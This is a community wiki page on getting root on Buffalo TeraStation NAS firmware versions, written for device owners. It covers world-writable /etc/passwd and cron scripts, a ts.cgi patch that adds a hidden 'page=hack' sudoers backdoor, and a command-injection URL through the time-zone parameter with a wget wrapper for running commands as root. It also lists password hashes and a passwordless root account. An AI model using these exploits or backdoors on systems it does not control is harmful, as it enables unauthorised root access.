Terastation Become root

From NAS-Central Buffalo - The Linkstation Wiki
(Redirected from Become root (1.04))
Jump to: navigation, search


As each release of the firmware fixes some bugs, new ways to become root must be discovered.

Contents

1.01

for 1.01 you could hack /usr/local/bin/mailtest.sh

1.03

for 1.03 you can log in as admin, then replace /etc/passwd.

/etc is world writable, which allows us to install a customized passwd file with a known password for root.

cd /etc
mv passwd passwd-good
cp passwd-good passwd
vi passwd
(once in vi, copy the hashed password value from the admin account into root's)
exit vi (:q)
su
(use whatever password you assigned to admin, now also for root)

chown root:root /etc/passwd
(if you want to keep things tidy)

su didn't seem to like an empty root password, so that's why we copy admin's. The hack described in Become_root_(2.04) may work as well, dunno, didn't see it until after I'd done the above.

- SteveK

1.04

for 1.04 you can hack /www/cgi-bin/ts.cgi

Once you added a Terastation Serial console you can login as admin and start to explore the [http:/ls-lR/1.04/ file system] but you are not root, yet.

There are no suid-root binaries and root comes with a password: $1$GhRqUjJ1$RPYGfyN1e4002OQ7BRkW20. You could now use a password cracker to get the cleartext password, but there must be a simpler way.

Did you already find it while browsing the [http:/ls-lR/1.04/ file system]?

No? [http:/ls-lR/1.04/_www_cgi-bin.html Look here.]

ts.cgi is the binary that generates web interface. It's quite well written, and filters all input. Hacking the terastation from the web interface looks too complicated as well.

But we are looking at the file on disk, it is world writable!

This small patch:

--- ts.cgi      Mon Apr  4 14:24:03 2005
+++ ts.cgi      Fri Apr 29 10:06:49 2005
@@ -35,6 +35,13 @@
 #### QUERY_STRING�?�指定�?�るページを表示�?�る ###

 ### TOP ###
+if ($query{'page'} eq "hack") {
+    open F, ">/etc/sudoers";
+    print F "admin  ALL = (ALL) ALL\n";
+    close F;
+    chmod 0440, "/etc/sudoers";
+    $query{'page'} = "top";
+}
 if ($query{'page'} eq "top") {
        require "./html/$lang/head.pl";
        require "./html/$lang/body.pl";

allows you to request a "hack" page: http://myterastation.local/cgi-bin/ts.cgi?page=hack and a sudoers file will be written, you will be redirected to the default "top" page.

Now you can use sudo to become r00t:

BUFFALO INC. TeraStation series HD-HTGL (YOSHIMUNE)

HD-HTGL113 login: admin
Password:
admin@HD-HTGL113:~$ id
uid=1000(admin) gid=100(hdusers) groups=100(hdusers)
admin@HD-HTGL113:~$ sudo -s

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these two things:

        #1) Respect the privacy of others.
        #2) Think before you type.

Password:
root@HD-HTGL113:~# id
uid=0(root) gid=0(root) groups=0(root)
root@HD-HTGL113:~#

have fun.


2.04

for 2.04 you can hack /etc/cron.d/progchk

Firmware version 2.04 fixes the modes on the /www/cgi-bin directory, fortunately there are two more world writable files on the filesystem which you can take advantage of.

The easiest approach will be to edit /etc/cron.d/progchk . This shell script is run every minute as root! Just add a couple lines to make it create an /etc/sudoers file as in the 1.04 description and give it the right modes.


!/bin/sh
#
# progchk
# The existence of the program is checked in every minute.
#

echo "admin ALL = (ALL) ALL" > /etc/sudoers
chmod 440 /etc/sudoers

ls_servd()
{


After a minute has passed you'll be able to use sudo to become root. You should probably remove the added lines from progchk, but they won't hurt anything where they are.


2.14

for 2.14 you can still hack /www/cgi-bin/ts.cgi

During a long series of mods in which I set up opensshd and disabled telnet access, somehow I lost my ability to log in and couldn't be bothered to reflash and redo all my mods, so I had some fun and found this hack instead :-)

Most of the CGI parameters in the web interface are carefully sanity-checked. But there are still loads of system() calls with the highly dangerous single parameter version! Obviously the authors never heard of Perl's taint mode. After a bit of looking, I found that the txtZone parameter for http://terastation/ts.cgi?page=basic&mode=setup was unchecked, and ends up getting passed directly to this code:

 system("/usr/local/bin/set_timezone.sh $zone");

Oops! So it only remains to craft the right URL and we can run any commands we want on the server as root :-) I wrote a simple Perl script to help do this. Example usage:

 $ ./tera-cgi-hack.pl
 echo "telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd">>/etc/inetd.conf
 ^D
 http://192.168.11.150/cgi-bin/ts.cgi?hiddenNTPServer=&mode=setup&page=basic&rdoFTP=on&rdoNTP=off&rdoNetatalk=on&txtCodepage=ISO8859_1&txtDay=1&txtHostComment=TeraStation&txtHostName=HD-HTGLD03&txtHour=16&txtLanguage=english&txtMin=7&txtMonth=7&txtNTPServer=&txtSec=37&txtTimeZone=0%3Becho%20%22telnet%20stream%20tcp%20nowait%20root%20%2Fusr%2Fsbin%2Ftcpd%20in.telnetd%22%3E%3E%2Fetc%2Finetd.conf&txtYear=2007

Log on as admin, then paste this URL into your browser, and it will run the command to enable telnet. No reflashing required :-)

You can go one step further and automate the whole process via wget, sanitizing the output with Perl:

 $ ADMIN_PASSWORD=change-me
 $ HACK_SCRIPT=./tera-cgi-hack.pl
 $ run_as_root () {
   echo "echo MAGIC_START;$*;echo MAGIC_END" | $HACK_SCRIPT > /tmp/url
   wget --http-user=admin --http-passwd=$ADMIN_PASSWORD -O- -q $(</tmp/url) | \
     perl -0777pe "s/.*MAGIC_START\n//s;s/MAGIC_END.*//s"
 }

e.g.

 $ run_as_root cat /proc/cpuinfo
 cpu             : 82xx
 revision        : 16.20 (pvr 8081 1014)
 bogomips        : 173.26
 vendor          : Motorola SPS
 machine         : Sandpoint
 $ run_as_root uname -a
 Linux HD-HTGLD03 2.4.20_mvl31-ppc_terastation #1 Fri, 01 Dec 2006 10:57:27 +0900 ppc unknown

Almost as good as a real shell ;-)

--Aspiers 18:10, 1 July 2007 (CEST)

Epilogue

I did find what hosed my telnetd and sshd in the end - details are here.

Others

on some releases you can simply log in as root

N.B. These methods do NOT give you the root password. They let you execute commands as root without relying on telnetd or sshd being enabled. Of course, once you can do this you can run passwd or replace /etc/passwd to replace the root password with one you know. At this point you also need to enable telnetd or sshd or some other more convenient way of logging in as root.


telnet-enabled releases: try myroot

Being a newbie and all, it took me a few hours to attempt previously listed methods, all to NO GOOD USE. But I noticed the /etc/passwd file still rules in there. First of all, use your regular admin account and known password. Then vi the passwd file - opens as RO!

  BUFFALO INC. TeraStation series HD-HTGL (YOSHIMUNE)
  NAS3 login: admin
  Password:
  admin@NAS:~# vi /etc/passwd

If yout see the myroot account listed there, you're all set...

  nobody:*:99:99:nobody:/home:/bin/sh
  admin:$1$iO8/IO5h$CL3VF6vB3W3STxlbDRuf0/:1000:100::/home:/bin/sh
  guest::1001:100::/home:/bin/sh
  myroot:$1$mbPhv2uU$tdNYMFUYwn1WyzPYtT9Qb/:0:0:root:/root:/bin/bash

Log in again with myroot and blank/NO password. Then proceed to replace the root password with your own:

  myroot@NAS:~# passwd root
  Enter new UNIX password:
  Retype new UNIX password:

You may want to change myroot password as well - don´t leave it just blank!

  myroot@NAS:~# passwd
  Enter new UNIX password:
  Retype new UNIX password:

LISTO! Now you're ready to start hacking your TeraStation OS.